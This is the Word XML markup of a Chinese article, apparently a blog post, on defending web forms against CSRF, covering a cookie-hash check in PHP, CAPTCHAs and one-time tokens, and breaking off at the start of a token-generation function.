                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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然后在服务器端进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="193" name="图片 12" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>      &lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['check'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['cookie']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['check'] == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> doJob();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>           } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>//...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>      } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>//...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>      }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>      ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="192" name="图片 13" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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这个方法个人觉得已经可以杜绝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>99%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击了，那还有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>呢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>由于用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>很容易由于网站的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>漏洞而被盗取，这就另外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。一般的攻击者看到有需要算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值，基本都会放弃了，某些除外，所以如果需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的杜绝，这个不是最好的方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(2).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>验证码</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这个方案的思路是：</w:t>
      </w:r>
      <w:r w:rsidRPr="0003400A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>每次的用户提交都需要用户在表单中填写一个图片上的随机字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，厄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这个方案可以完全解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，但个人觉得在易用性方面似乎不是太好，还有听闻是验证码图片的使用涉及了一个被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，可能在某些版本的微软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中受影响。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(3).One-Time Tokens(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不同的表单包含一个不同的伪随机值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</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在实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>One-Time Tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>时，需要注意一点：就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>并行会话的兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。如果用户在一个站点上同时打开了两个不同的表单，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>保护措施不应该影响到他对任何表单的提交。考虑一下如果每次表单被装入时站点生成一个伪随机值来覆盖以前的伪随机值将会发生什么情况：用户只能成功地提交他最后打开的表单，因为所有其他的表单都含有非法的伪随机值。必须小心操作以确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>保护措施不会影响选项卡式的浏览或者利用多个浏览器窗口浏览一个站点。</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以下我的实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>先是令牌生成函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(gen_token())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="191" name="图片 14" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     &lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> gen_token() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
